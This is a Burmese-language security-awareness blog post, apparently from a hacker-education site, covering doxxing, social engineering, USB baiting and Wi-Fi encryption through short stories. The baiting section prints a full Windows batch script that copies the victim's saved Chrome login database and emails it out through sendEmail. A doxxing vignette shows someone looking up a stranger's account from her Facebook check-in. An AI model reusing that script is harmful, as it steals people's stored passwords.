Doxxing (မှတ်တမ်းစုခြင်း)

Dox ဆိုတဲ့ စကားလုံးက မူရင်း အင်္ဂလိပ်စာလုံး document (မှတ်တမ်းတင်သည်) ၏ အတိုကောက် doc ကို ဖေါ်ပြတဲ့ ဗန်းစကားပါ။ တိုက်ခိုက်သူတွေ အတွက် တော့ လက်နှက်တစ်မျိုးပေါ့၊ အရူး သိပ္ပံပညာရှင်တွေအတွက်တော့ အရမ်းအဖိုးတန်တဲ့ အလေ့အကျင့်တစ်ခု ပေါ့။ ၎င်းနည်းလမ်းကို တစ်ဦးတစ်ယောက်ရဲ့ အချက်အလက်တွေ စုစည်းလေ့လာဖို့ အသုံးပြုပါတယ်၊ ထိုသို့ စုစည်းဖို့ ဟက်ခြင်း၊ social engineer လုပ်ခြင်း နှင့် လူသိရှင်ကြား တင်ထားတဲ့ အချက်အလက်တွေနှင့် Facebook ကဲ့သို့ လူမှုကွန်ယက်တွေမှာရှာဖွေခြင်း စသဖြင့်  လုပ်ခြင်းများ ဖြစ်ပါတယ်။  ဥပဒေဆိုင်ရာ သက်သေခိုင်လုံစေခြင်းအတွက် အကူအညီပေးရန်၊ စီးပွားရေး စိစစ်မှုများပြုလုပ်ရန်၊ အနှောက်အယှက်ပေးရန်၊ အယုံသွင်းရန်၊ အွန်လိုင်းတွင် အရှက်ရစေရန် စသည့် ရည်ရွယ်ချက်အမျိုးမျိုးအတွက် Doxing လုပ်ကြပါတယ်။

ကစားပွဲ စတင်

မင်းမောင်မောင်က ကော်ဖီဆိုင်တစ်ခုမှာ တွေ့လိုက်တဲ့ကောင်မလေးတစ်ယောက်ကို စိတ်ဝင်စားမိသွားပါတယ်။ ဒါပေမယ့် သူအခုမှ စတွေ့ဖူးတဲ့ မိန်းကလေးတစ်ယောက်ကို ၀င်မိတ်ဆက်ဖို့က သူ့အတွက် ခက်ခဲနေခဲ့တာကြောင့် သူမကို မိတ်ဆက်ဖို့ သူမအကြောင်း အနည်းငယ်လောက်သိထားရရင် ကောင်းမှပဲလို့ သူစဉ်းစားမိခဲ့တယ်။ ကံအားလျှော်စွာပဲ၊ အဲဒီကောင်မလေးက selfie ရိုက်ပြီး၊ facebook ပေါ်မှာ check-in လုပ်နေတာသူ သတိထားမိလိုက်ပါတယ်။ “ဟုတ်ပြီ၊ သူမမှာ အခု အားနည်းချက်တစ်ခု ရှိသွားပြီ ‘check-in’ လုပ်လိုက်တာပဲ၊ နောက်အားနည်းချက်တစ်ခုများ ရနိုင်မလား ‘public post’ လေး လုပ်ပါဦး” ဟုပြောရင်း အဲဒီ ကော်ဖီဆိုင်ရဲ့ facebook page မှာ check-in လုပ်ထားတဲ့ သူမ အကောင့်ကို သူ ရှာလိုက်ပါတယ်။

ကစားပွဲ ပြီးဆုံး

ကျွန်တော်တို့၊ Public post မတင်သင့်သလို၊ ကိုယ်ရောက်နေတဲ့ နေရာကိုလည်း လူမှုကွန်ယက်ပေါ်မှာ အမြဲတမ်း မဖေါ်ပြသင့်ပါဘူး။ ခင်ဗျားကို ဘယ်သူမှ doxing လုပ်မနေဘူးလို့၊ ခင်ဗျား အမြဲတမ်း မယုံကြည်ထားသင့်ပါဘူး။ ဒီအကြောင်းအရာကိုအခြေခံပြီး  သရုပ်ဖေါ်ပြထားတဲ့ လင့်ခ်လေးတစ်ခုကို ဖေါ်ပြပေးထားပါတယ်။

 

ဟက်ကာများအတွက် စာသင်ကျောင်းပါ၊

ဒါကြောင့် ခင်ဗျားအတွက် ပေါ့။

ကျွန်တော်တို့ မိသားစုမှ ကြိုဆိုပါတယ်။

(Starry Sky)

လူသိများတဲ့ Social Engineering နည်းလမ်းများ

ကျွမ်းကျင်တဲ့ အင်ဂျင်နီယာတစ်ယောက်က လက်ရှိပြဿနာတစ်ခုကို ဖြေရှင်းဖို့နည်းလမ်းရှာသစ်တွေရှာဖွေတွေ့ရှိခြင်းကို ဟက်ကင်း တစ်ခုလို့ခေါ်နိုင်ပါတယ် – http://schoolforhackers.com/category/hacking-tools/ မှ ကိုးကားဖေါ်ပြထားတဲ့ Hack to live ဆိုတဲ့ ဆောင်းပါးတစ်ခုမှာ ပိုမိုဖတ်ကြည့်နိုင်ပါတယ်။ သေချာတာက ခင်ဗျားလိုချင်တာ၊ ဖြစ်စေချင်တာကို ရအောင်ရယူတဲ့၊ ဖြစ်အောင်လုပ်တဲ့ နည်းလမ်းရှာဖွေ လိုက်တာပဲပေါ့။ အသုံးများတဲ့ social engineering နည်းလမ်း ၅ ခုလောက်ဆွေးနွေးကြည့်ရအောင်။

၁။ ငါးစာချခြင်း (biating)

               ငါးစားချခြင်းလို့ တင်စားထားတာပါ။ ထိုနည်းလမ်းက ငါးမျှားခြင်းလို့သိနိုင်တဲ့ Phishing နည်းလမ်းနဲ့ တူပါတယ်။ အခြား social engineering တွေနဲ့ ကွာခြားချက်ကတော့၊ ဟက်ကာက ပစ်မှတ်ကို ဖြားယောင်းရန် အသုံးပြုတဲ့ အချက်တွေပါပဲ။ baiter တွေက သီချင်းတွေ၊ ရုပ်ရှင်တွေ အခမဲ့ဒေါင်းလုတ် လုပ်နိုင်ရန် ကမ်းလှမ်းပေးတတ်ကြပါတယ်။ ထိုနည်းလမ်းက တိုက်ခိုက်သူတွေက လူတွေရဲ့ စပ်စုချင်စိတ် ပေါ်မှာ ရုပ်ဝတ္ထုကြားခံတွေ သုံးပြီး တိုက်ခိုက်တဲ့ နည်းလမ်းတစ်ခုဖြစ်ပါတယ်။

ကစားပွဲစတင်

မင်းမောင်မောင်က ယူအက်စ်ဘီ စတစ်လေးတွေကို သူ့အခန်းဖေါ်တွေရဲ့ စားပွဲနားမှာ၊ လက်တွေ့ခန်း ၀န်းကျင်မှာ ချထားခဲ့ ပါတယ်။ သူအခန်းဖေါ်တစ်ယောက်က ယူအက်စဘီ စတစ်လေးကို ကောက်ယူထားပြီး ဘာတွေများပါမလဲလို့ သူ့ လပ်တော့ခ်မှာ ဖွင့်ကြည့် လိုက်ပါတယ် ။  ။  “ဟာ သီချင်းတွေအများကြီးပဲ၊ ဗွီဒီယိုတွေလည်းပါတယ်၊ ပွတာပဲဟေ့။ ဒီမှာ စိတ်ဝင်စားစရာ ဗွီဒီယိုက “ငါ့ အကြောင်း” ဆိုပါလား ဖွင့်ကြည့်လိုက်ဦးမယ် ဘယ်သူ့ စတစ်ဆိုတာသိရတာပေါ့။” အခန်းဖေါ်က ရေရွတ်ရင်း ဗွီဒီယိုလေးကို ဖွင့်ကြည့် လိုက်ပါတယ်။ မင်းမောင်မောင်က “အဖိုးရေကျွန်တော် အဲဒီ စတစ်ထဲမှာထည့်ထားတဲ့ ဗွီဒီယိုဖိုင်နဲ့ တွဲချိတ်ထားတဲ့ ငါးမျှားချိတ်ကတော့ ။ ။ batch ဖိုင်လေးတစ်ဖိုင်ပါပဲ၊ အဲဒီဖိုင်ထဲမှာ –

@echo off
 
color 08
 
mkdir \a C:\Users\%username%\Documents\sm
 
move /Y sendEmail.exe C:\Users\%username%\Documents\sm
 
PATH=%path%; C:\Users\%username%\Documents\sm
 
cd %appdata%\..\Local\Google\Chrome\”User Data”\Default\
 
xcopy “Login Data” C:\Users\%username%\Documents /S /D /Y /Q /H /C
 
cd C:\Users\%username%\Documents\
 
copy /Y “Login Data” LoginData
 
cd C:\Users\%username%\Documents\sm\
 
sendEmail -f from@gmail.com -u subject -m Message Body -a C:\Users\%username%\Documents\LoginData -t to@gmail.com -s smtp.gmail.com:587 -xu user@gmail.com -xp password -o tls=yes
 
start http://www.animateit.net/data/media/feb2013/love_roses_03.gif

 

ဒီ windows script လေးတစ်ချို့ရေးထားတယ်၊ ပြီးတော့ bat to exe ပြောင်းပြီး sendEmail.exe ရယ်၊ ဗွီဒီယိုဖိုင် တစ်ဖိုင်ရယ်နဲ့ တွဲ ထားလိုက်တယ်။ သိပ်မကြာခင်၊ သူ့ရဲ့ Google Chrome ထဲက LoginData ဖိုင်ကို ကျွန်တော်ရတော့မယ်၊ တကယ်လို့ သူက browser မှာ စကားဝှက်တွေ သိမ်းထားရင်တော့၊ သူ့ logindata ဖိုင်ကို ကျွန်တော့ Google Chrome Profile ထဲ ထည့်လိုက်ရင် သူ့ browser မှာ သိမ်းထားတဲ့ စကားဝှက်တွေ ရတော့မှာပေါ့ဗျာ။” လို့ ကွန်ပြူတာ ဖန်သားပြင်ပေါ်မှာ စိုက်ကြည့်ရင်း ပြောလိုက်ပါတယ်။

ကစားပွဲပြီးဆုံး           

 ဒါပေါ့ဗျာ၊ ယူအက်စ်ဘီလေး ကောက်ရတယ်ဆိုပြီး၊ မစပ်စု သင့်ပါဘူး။ ဖေါ်ပြထားတဲ့ script လေးက၊ အပျော်တမ်းဆိုပေမယ့်၊ အပြင်မှာ တစ်ကယ်ရည်ရွယ်ချက်ရှိရှိ တိုက်ခိုက်နေတဲ့ တိုက်ခိုက်သူတွေ တကယ်ရှိနေတယ်ဆိုတာ သတိထားသင့်ပါတယ်။

“ကျွမ်းကျင်ဟက်ကာတွေအဆိုအရ၊ မဟက်ခံရအောင် ဘယ်လိုကာကွယ်မလဲ” ဆောင်းပါးမှ၊ ဟက်ကင်းဆိုင်ရာ အကြံပြုချက်

Backlit keyboard

တီဗွီစတားတစ်ယောက်ဖြစ်တဲ့ Kevin Roose ဆိုသူက ဒီကိစ္စကိုမေးမြန်းခဲ့ပြီး၊ သဘောပေါက်ခဲ့ပါတယ်။ သူက လူတွေဘယ်လို ဟက်ခံရတယ် ဆိုတာကို သုတေသနစစ်တမ်း လုပ်ခြင်ခဲ့တာကြောင့်၊ သူ့ကို ဟက်ရန် လူသိများတဲ့ ဟက်ကာတချို့ကို သူကိုယ်တိုင်ဖိတ်ကြား ဖို့ ဆုံးဖြတ်ခဲ့ပါတယ်။ ပြီးတော့ သူ့ကို ဟက်ခဲ့ကြပါတယ်၊ သူ့ ၀က်ဘ် ကင်မရာထဲက၊ (ဓါတ်ပုံတွေကို ၂မိနစ်တိုင်း) မှ သူ့ အွန်လိုင်းအကောင့် တွေအထိ ရသမျှ ခရက် ခဲ့ကြတယ်။ ပုဂ္ဂိုလ်ရေးအရပြောရရင်တော့၊ ကျွန်တော်ဆိုရင် ဒီလိုမလုပ်ပါဘူး။ ထိုသို့လုပ်ခြင်းက၊ ဟက်လုပ်ခြင်း တတ်မြောက်ရေး နဲ့ လူတွေ ဘယ်လို ဟက်ခံရတယ် ဆိုတာတွေကို အသားပေးလွန်းနေပါတယ်၊ အလေးပေးရမှာက ဘယ်လိုတွေ မလုပ်ရဘူး ဆိုတာပါပဲ။

သူအဆိုပြုတဲ့ တချို့ဖြေရှင်းနည်းတွေက အခန့်မသင့်ရင် နှစ်ဖက်ချွန်ဓါးတစ်ချောင်းနဲ့တူတတ်တဲ့ password manager အသုံးပြုခြင်းကဲ့သို့၊ ရင်းနှီးပြီးသားတွေပါ။ ကျန်တာတွေကတော့ ကျွန်တော့်အတွက် အသစ်တွေဖြစ်နေတယ် – Little Snitch ဆိုတဲ့ app တစ်ခုကို ခင်ဗျား ကြားဖူးပါသလား? အဲဒီ app က၊ ခင်ဗျားရဲ့ outgoing traffic ကို သံသရဖြစ်စရာ လှုပ်ရှားမှုတွေ ရှိ၊မရှိ စောင့်ကြည့်ပေးပါတယ်။ (ကျွန်တော့် ကွန်ပြူတာက ကျွန်တော့် credit card ရဲ့ စာရင်းရှင်းတမ်းတွေကို ဘာကြောင့် တရုတ်သို့ ပို့နေတာလဲ?)

ပြီးတော့ တချို့ “အဖြေများ” က အသုံးပြုသူတွေက ကိုယ့်ကိုယ်ကို ကာကွယ်ဖို့ကြိုးစားရင်း ချိုးဖျက်ဝင်ရောက်သူတွေအတွက် အကျိုးရှိ သွားစေတာမျိုး ဖြစ်တတ်ပါတယ် – ဥပမာ – VPN အသုံးပြုတာမျိုးပေါ့။  ရှေ့လျှောက် ဒီကိစ္စနဲ့ ပတ်သတ်ပြီး၊ ခင်ဗျားပိုသိရမှာပါ။ အခု လတ်တလောအတွက်တော့ အလားအလာရှိတဲ့ ခရက်ကာတွေ၊ ဟက်ကာတွေ နဲ့ လုံခြုံရေး ကျွမ်းကျင်တွေ အတွက် ဤဆောင်းပါးကို ဖတ်ကြည့်ပေးပါ။ (Image courtesy of User: Colin at wikimedia.org)

ခင်ဗျားက သဘောကောင်းလွန်းတဲ့သူလား၊ လုံခြုံရေးကို ဂရုစိုက်တတ်တဲ့သူလား?

are you that goodခင်ဗျား ထုတ်ထားတဲ့ကြိုးမဲ့ကွန်ယက်ကို ခင်ဗျားအိမ်နီးချင်းမြင်တဲ့အခါ၊ သူပထမဆုံး စဉ်းစားတာက “ဟာ ဘေးအိမ်က wifi မိနေပါလား၊ ကံကောင်းရင်တော့ အခမဲ့အင်တာနက်သုံးခွင့်ရမှာပဲ” လို့စဉ်းစားရင်း ။ ။ ကလစ်!
ဒါဆို ခင်ဗျားသဘောကရော? ခင်ဗျားရဲ့ wifi ကို၊ အားလုံးကိုပေးသုံးချင်သလား? ဒါမှမဟုတ်၊ တစ်ဦးတည်း သီးသန့်ထားပြီးသုံးချင်တာလား၊ ဒါမှမဟုတ်၊ သုံးခွင့်ပေးမည့်သူကို ရွေးချယ်ကန့်သတ်ပြီး၊ ဝေမျှသုံးချင်တာလား? ခင်ဗျားရဲ့ ကြိုးမဲ့ကွန်ယက်လုံခြုံရေးအတွက် စိတ်ပူတယ်ဆိုရင်တော့၊ ခင်ဗျားရဲ့ ကြိုးမဲ့ကွန်ယက်ကို ကာကွယ်ထားသင့်ပါတယ်။ ခင်ဗျား ကွန်ယက်ထဲကို ၀င်လာတဲ့သူအားလုံးက၊ ခင်ဗျား မျှပေးထားတဲ့၊ အင်တာနက်အသုံးပြု ခွင့်ရဖို့ ရည်ရွယ်ချက်တစ်ခုတည်းရှိတာမဟုတ်ပါဘူး။
စင်ဒရဲလား၊ ရုပ်ရှင်ထဲမှာ မင်းသားလေးက၊ မည်သည့်ပျိုကညာမဆိုတက်ရောက်နိုင်တဲ့၊ ကြင်ယာဖက်ရွေးတဲ့ ပါတီလေးတစ်ခုကို ကျင်းပ လိုက်ပါတယ်၊ ဒါပေမယ့် သူရည်စူးခဲ့တာ စင်ဒရဲလားမင်းသမီးလေးတစ်ယောက်တည်းကိုပါ။ ကံမကောင်းစွာနဲ့ စင်ဒရဲလားလေးရဲ့ မထွေးနှစ်ယောက် တက်ရောက်ခဲ့ကြတယ်။ သူတို့ရဲ့ မိခင်လုပ်သူက နန်းတွင်းထဲလိုက်ပါလာပြီး အတွင်းသတင်းတွေကို၊ ခိုးနားထောင်ပြီး တော်ဝင်မူးမတ်ကို အကြပ်ကိုင်ခြိမ်းခြောက်ခဲ့ပါတယ်။ ဒါကြောင့် ဒီပွဲကို တက်ရောက်လာတဲ့ သူတိုင်းက မင်းသားလေးရဲ့ ဧည့်ခံပွဲကို ဆင်နွှဲဖို့ ရည်ရွယ်ချက်တစ်ခုတည်း မဟုတ်ပါဘူး၊ နောက်ကွယ်မှာ၊ အကျိုးအမြတ်အတွက် ရည်ရွယ်ချက်တွေရှိနေပါတယ်။
ဇာတ်လမ်းကြည့်နေရင်းမှ၊ မင်းမောင်မောင်က ရုတ်တရက်ထပြီး “အဖိုးရေ၊ ကျွန်တော်တို့ wifi ကို၊ အားလုံးပေးသုံးလို့တော့ မဖြစ်တော့ဘူး၊ ကျွန်တော်တို့ကာကွယ်မှုတွေလုပ်သင့်တယ်။” လို့ပြောလိုက်ပါတယ်။ အဖိုးက “ကာကွယ်မှုတွေကဘယ်လိုလုပ်ရမှာလဲ၊ ငါ့ သံသေတ္တာထဲမှာ ထည့်ထားလိုက်ရင် ရမလား?” “အဲလိုကာကွယ်တာကိုပြောတာမဟုတ်ဘူးဗျ၊ အဖိုးရဲ့ စမတ်ဖုန်းနဲ့၊ ကျွန်တော့် laptop က အင်တာနက်လိုင်းတစ်ခု တည်းကို မျှပြီးသုံးခွင့်ရနေဖို့တော့၊ wifi ကိုလွှင့်ထားဖို့လိုတယ်လေ၊ ဒါပေမယ့် ကျွန်တော်တို့နှစ်ယောက်ကလွဲပြီး တခြားသူတွေ ၀င်လို့မရအောင် ကာကွယ်ရမှာဗျ။” လို့ မင်းမောင်မောင်က ပြောလိုက်ပါတယ်။ “ဒီမှာကြည့်၊ ကာကွယ်မှုတွေအများကြီးရွေးလို့ရတယ်၊ တိုက်ခိုက်မှုအမျိုးအစားအမျိုးမျိုး ကိုလည်းတော်တော်များများ ကာကွယ်ထားလို့ရတဲ့၊ firewall ပြင်ဆင်မှုတွေတောင်လုပ်လို့ရသေးတယ်ဗျ။” လို့ သူ့ရဲ့ browser မှတဆင့်၊ wifi စက်လေးထဲ ၀င်ပြရင်း၊ အဖိုးကိုပြောလိုက်ပါတယ်။” ပြီးတော့ဆက်ပြီး “ဒီမှာ wep ၊ wpa ၊ wpa2 ဆိုတဲ့ ကာကွယ်မှုတွေရှိတယ်ဗျ။”လို့ပြောလိုက်ပါ တယ်။ အဖိုးက၊ “အဲ၊ ဘာတွေ?” “ကျွန်တော်ရှင်းပြပါမယ်၊ wep ဆိုတာ၊ wired equivalent privacy ၊ IEEE 802.11 လို့ခေါ်တဲ့ ကြိုးမဲ့ကွန်ယက် တွေအတွက် လုံခြုံရေးဆိုင်ရာ အယ်လဂိုရီသမ် တစ်ခုပါ။ ၎င်းကို၊ hexadecimal (သို့) အခြေ ၁၆ ရှိ၊ နံပါတ်စနစ် ၁၀ (သို့) ၂၆ လုံးဖြင့် ဖွဲ့ပုံဖေါ်ထားပါတယ်။ အခြေခံ wep encrypt နည်းလမ်းက – (IV) လို့ခေါ်တဲ့ initialization vector (ကျပန်းနံပါတ်) တွေနဲ့ ရိုက်ထည့်လိုက်တဲ့ wep key တွေကို ပေါင်း၍၊ RC4 လို့ခေါ်တဲ့ encryption လုပ်တဲ့ အယ်လဂိုရီသမ် (cyper/ciper) ကိုသုံးပြီး ရလာတဲ့ keystream ကို IV ပေါ်မှာမူတည်ပြီး၊ ထုတ်ပေးထားတဲ့၊ plaintext တွေနဲ့ Exclusive OR gate ကိုဖြတ်၍ (encrypted လုပ်ပြီးသား) ciper text တွေရလာပါတယ်။ ၎င်းကို 64-bit encryption မှ 128-bit အထိ တိုးချဲ့အသုံးပြုနိုင်ခဲ့ပေမယ့်၊ ၂၀၀၃ ခုနှစ်ပိုင်း မှာတော့၊ WEP အား၊ WPA (Wifi- Protected Access) လုံခြုံရေးစနစ်ဖြင့်၊ အစားထိုးလိုက်ပြီလို့၊ Wi-Fi Alliance ကကြေငြာခဲ့ပါတယ်။ ဒါဆို WPA ဆိုတာ ဘာလဲ? WPA ကို တစ်ခါတစ်ရံ IEEE 802.11i (IEEE 802.11 အားဖြည့်စွက်ပြင်ဆင်ထားသော) မူကြမ်း စံချိန်အဖြစ်လည်း ရည်ညွှန်းပါတယ်။ ၎င်းကို ပိုမိုလုံခြုံတဲ့၊ ပိုမို ရှုပ်ထွေးတဲ့ ၊ WPA2 အထိ ကြိုတင် မျှော်မှန်းခဲ့ကြပါတယ်။ WPA2 ကို ၂၀၀၄ ခုနှစ်မှာ စတင်အသုံးပြုနိုင်ခဲ့ပါတယ်။ WEP က ကွန်ယက်ချိတ်ဆက်မှုအစဉ်အလာဖြစ်တဲ့ wired ကွန်ယက်လုံခြုံရေးဖြင့်ယှဉ်လျှက်၊ အချက်အလက်စိတ်ချနိုင်မှုကို အထောက်အကူဖြစ်စေခဲ့ပြီး၊ WPA ကိုတော့၊ ကြိုးမဲ့ကွန်ယက်ချိတ်ဆက်မှုအတွက် သီးသန့်အသုံးပြုရန် ပုံစံချထုတ်လုပ်ခဲ့တာပါ။ WPA ပြင်ဆင်ခြင်းမှာ၊ အများအားဖြင့် WPA-PSK (Pre-shared Key) ကို အခြေခံအားဖြင့် သုံးကြပါတယ်၊ ၎င်းက 256-bit key encryption ကို အသုံးပြုပါတယ်။ ပြီးတော့၊ တိုက်ခိုက်သူတစ်ယောက်ယောက်က၊ access point နဲ့ client ကြားက packet တွေကို ရယူထားလား၊ ပြင်ဆင်ထားလား ဆိုတာတွေ စစ်ဆေးပေးတဲ့ message integrity check စနစ်လည်းပါဝင်လာတယ်။ WPAII မှာ၊ WPA နဲ့ ကွာခြားတဲ့တိုးတက်ပြောင်းလဲမှုတစ်ခု ကတော့၊ Advanced Encryption Standard (AES) ကို မဖြစ်မနေ သုံးရတာပါပဲ။” လို့ ဆက်ပြီးရှင်းပြခဲ့ပါတယ်။ အဖိုးကတော့ “ခေါင်းတွေမူးလိုက်တာ၊ ကာကွယ်မယ်ဆိုလည်း၊ မြန်မြန်ကာပါတော့” လို့ပြောခဲ့ပါတယ်။ ဆက်ပြီး “ဒါနဲ့၊ WPA ဆိုတာနဲ့ ကာကွာ၊ သူ့ ကြည့်ရတာ ပိုလုံခြုံမယ့်ပုံပဲ။” လို့ဆက် ပြောခဲ့ပါတယ်။ အဖိုးသဘောပေါက်သွားပုံရပါတယ်။ အဖိုးအတွက်တော့ ဒီလိုမြေးလေးရှိနေတာ အားရစရာပါပဲ။
ဟုတ်ပါတယ်၊ လူငယ်တွေမှာ ထက်မြတ်တဲ့ အရည်အသွေးတွေရှိကြပါတယ်။ သူတို့ရဲ့ စိတ်ကူးတွေကို အကောင်းဆုံး ပုံဖေါ်နိုင်အောင် ကျွန်တော်တို့က ပံ့ပိုးပေးဖို့ လိုပါတယ်။ သူတို့ကို ဘယ်လိုလုပ်ရမယ်ဆိုတာပြောပြခြင်းထက်၊ ဘာတွေလုပ်လို့ရတယ်၊ အကျိုးဆက်တွေက ဘာတွေ ဖြစ်လာနိုင်တယ်၊ ဆိုတာတွေ ပြောပြပေးနိုင်ဖို့ ပိုမိုလိုအပ်ပါတယ်။ သူတို့ရဲ့၊ ဉာဏ်ကွန့်မြူးမှုတွေကို တားဆီးနေရင်၊ စိတ်ကူးကောင်း မပြောနဲ့၊ ဘာကြောင့်ဆိုတာတောင် သူတို့တော်တော် စဉ်းစားနေရပါလိမ့်မယ်။ Hacker Highschool ရဲ့ အဓိက ရည်ရွယ်ချက်ကလည်း၊ လူငယ်တွေကို မာန်မာနကင်းစွာဖြင့်၊ အကောင်းဆုံးစဉ်းစား၊ ပုံဖေါ်တတ်ပြီး မြင့်မားလာစေရန်၊ ရည်ရွယ်ထားပါတယ်။ ကျွန်တော်တို့ပတ်ဝန်းကျင်မှာလည်း၊ မင်းမောင်မောင်က အဖိုးကို ကူညီပေးသလို၊ ကျွန်တော်တို့ကို နည်းပညာတွေအပေါ်မှာ ကောင်းစွာ အသုံးပြုနိုင်ရန်၊ အနည်းဆုံး၊ စက်ပစ္စည်းတစ်ခုကို မှန်ကန်တဲ့ဈေးနှုန်းနဲ့ဝယ်ယူနိုင်ရန်၊ ကူညီပေးနိုင်မယ့် သူတစ်ယောက်ရှိနေဖို့ လိုအပ်ပါတယ်။
အခုတော့ မင်းမောင်မောင်က၊ ကျောင်း conference တစ်ခုမှာ ပြသဖို့ ပြင်ပကဖြစ်ရပ်တစ်ခုပေါ်မှာအခြေခံထားတဲ့ presentation တစ်ခုကို ဖန်တီးနေပါတယ်။ “ရိုက်စားလုပ်တဲ့ အိုင်တီငနဲ” လို့ ခေါင်းစည်း စတင်လိုက်ပါတယ်။ ။

 

လူမှုရေး ဇာတ်လမ်းဆင်ခြင်း

SE

လူမှုရေး ဇာတ်လမ်းဆင်ခြင်းဆိုတာ၊ လူတွေရဲ့ စိတ်ဓါတ်ရေးရာကြိုးကိုင်ခြင်းလို့ အတိုချုံးသိနိုင်ပါတယ်၊ တရားဝင်တဲ့ လိမ်လည်ခြင်းပေါ့၊ ဒါပေမယ့် ရုပ်ရှင်ရုံလို လူထူတဲ့နေရာတွေမှာ “မီးဗျို့” လို့တော့ မအော်နဲ့ပေါ့ဗျာ။

“ဟုတ်တယ် ဒါက တိုက်ခိုက်မှုပုံစံ တစ်ခုပါ၊ ၎င်းက လူတွေရဲ့ တုံ့ပြန်မှုပေါ်မှာ အပြည့်အ၀နီးပါး မူတည်ပါတယ်၊ လူတွေကို လှည့်စားခြင်း၊ ဖိအားပေးခြင်းတွေ ဒါမှမဟုတ် သူတို့ရဲ့ ရူးသွတ်မှုတွေကို အသုံးချခြင်းတွေ လုပ်တာပေါ့။ social engineering လို့ပဲ ခေါ်ကြရအောင်ဗျာ” လို့ မင်းမောင်မောင်က အဖိုးကိုပြောပြနေပါတယ်။

“ယုံကြည်မူပြိုင်ပွဲ (con game)တစ်ခု ပေါ့ဗျာ။ ဥပမာ – တိုက်ခိုက်သူက ရုံးထဲကို အရေးတကြီး ၀င်ဖို့လိုနေတဲ့ လုပ်ဖေါ်ကိုင်ဖက် တစ်ယောက်လို ဟန်ဆောင်ပြီး ရုံးဝန်ထမ်းတစ်ယောက်ယောက်ကို အယုံသွင်းပြီး ရုံးခန်းတံခါးဖွင့်ပေးဖို့ အကူအညီတောင်းတာမျိုးပေါ့။” လို့ဆက်ပြောလိုက်ပါတယ်။ အဖိုးက “ဒါက လိမ်တာပဲပေါ့၊ လူလိမ်တစ်ယောက်နဲ့ ဘာကွာသွားလို့လဲကွ။” လို့ ပြန်မေးခဲ့ပါတယ်။

“လူလိမ်လိုမျိုးတော့ မဟုတ်ဘူးဗျ၊ ကိုယ်လိုချင်တာကို သွယ်ဝိုက်တဲ့ နည်းလမ်းနဲ့ ရအောင်ယူတာလို့ ပြောလို့ရတယ်၊ ဘာကြောင့်လဲဆိုတော့ တစ်ခါတစ်ရံ အရမ်းသိမ်မွေ့တဲ့ နည်းလမ်းမျိုးတွေလည်းရှိလို့ပါ။ ကျွန်တော် ထင်ရှားတဲ့ ဥပမာ တစ်ခုပြောပြမယ်ဗျာ။ Catch Me If You Can ဆိုတဲ့ ဇာတ်ကားမှာ social engineering နဲ့ ပက်သတ်လို့ တော်တော်ကြည့်ရတယ်ဗျ။ ဖရန့်ခ်ရဲ့ အဖေက ဖရန့်ခ် ကို အမေရိကန်မှာ ယမ်းကီးတွေဘာကြောင့်အမြဲနိုင်လဲလို့မေးခဲ့တယ်။ ဖရန့်ကတော့ ရိုးရိုးလေး စဉ်းစားပြီး သူတို့မှာ မစ်ကီ မန်တယ်လ် ရှိနေလို့လေလို့ ဖြေခဲ့တယ်။ ဒါပေမယ့် ဖရန့်အဖေကတော့။ ။ မဟုတ်ဘူး၊ သူတို့အမြဲနိုင်တာ၊ ပြိုင်ဖက်အသင်းက သူတို့ အင်္ကျီပေါ်က အစင်းသေးသေးလေးတွေကို အမြဲစိုက်ကြည့် မိနေလို့ပဲ လို့ပြောခဲ့ပါတယ်။

နောက်တစ်ခု ပိုပြီးသိသာတာကို အဖိုးကိုပြောပြဦးမယ်။ ဖရန့်ခ်က သူ့လုပ်ငန်းတွေကို စတင်နေတဲ့အချိန်ပေါ့။ သူ PAN AM ရဲ့ လေယာဉ်မှူး တစ်ယောက် ဖြစ်ဖို့ PAN AM ရဲ့ ယူနီဖောင်းအစစ်ရဖို့လိုအပ်ခဲ့တာကြောင့် PAN AM ကို ဖုန်းဆက်ခဲ့ပါတယ်။

ဧည့်ကြို။  ။ ပန်အမ်ကပါ၊ ဘာများကူညီရမလဲရှင်။

ဖရန့်ခ်။    ။ ယူနီဖောင်းကိစ္စလေးပြောချင်လို့၊ ခေါ်လိုက်တာပါ ခင်ဗျာ။

ဧည့်ကြို။  ။ အ၀ယ်ဌာနကို ဖုန်းလွှဲပေးပါမယ်။

အ၀ယ်ဌာန။   ။ ဘာများကူညီရမလဲ ရှင်။

ဖရန့်ခ် (တောင်ပိုင်းလေသံဖမ်း၍) ။        ။ ကျွန်တော်က လက်ထောက်လေယာဉ်မှူးပါခင်ဗျာ၊ ညက နယူးရောက်ခ် ကိုပျံသန်းခဲ့တာပါ၊ ဒါပေမယ့် ပဲရစ်ကို သုံးနာရီအတွင်းကျွန်တော် ပြန်ထွက်ရမယ် ခင်ဗျ။ ပြဿနာက၊ ကျွန်တော့် ယူနီဖောင်းတွေကို လျှော်ဖို့ ဟိုတယ်ကနေ ပို့လိုက်ပါတယ်၊ ဒါပေမယ့် အဲဒီမှာ ပျောက်သွားတယ် ထင်တယ်။

အ၀ယ်ဌာန။   ။ သူတို့ ယူနီဖောင်းတွေကို အမြဲဖျောက်နေကျပါ။ မပူပါနဲ့ရှင်၊ ကိုးလမ်း နဲ့ ဘရော့ဒ်ဝေး နားက well-build ယူနီဖောင်းကုမ္ပဏီကို သွားလိုက်ပါ၊ Mr. Rosen ကို ရှင်ရောက်လာမယ့်အကြောင်း ကျွန်မ မှာထားပေးပါမယ်။

နောက်ဆုံးမှာ၊ သူ PAN AM ရဲ့ လေယာဉ်မှူးယူနီဖောင်း ရသွားတာပေါ့။ ဒါဟာ social engineering ပါပဲ အဖိုး။ ဖရန့်ခ် က ယုံကြည်မှုရှိသူ တစ်ယောက်ပါ။ ဟုတ်ပါတယ်၊ ယုံကြည်မှု  ရှိသူ (con man) social engineering လုပ်ဖို့ ဒါဟာအဓိက လိုအပ်တဲ့ အရည်အချင်းပဲ၊ အဖိုးရေ။” လို့ မင်းမောင်မောင်က social engineering အကြောင်းကို သူ့ရဲ့ အကြိုက်ဆုံး ဇာတ်လမ်းတစ်ခုနဲ့ ဥပမာပေးပြီးရှင်းပြခဲ့ပါတယ်။ ပြီးတော့….

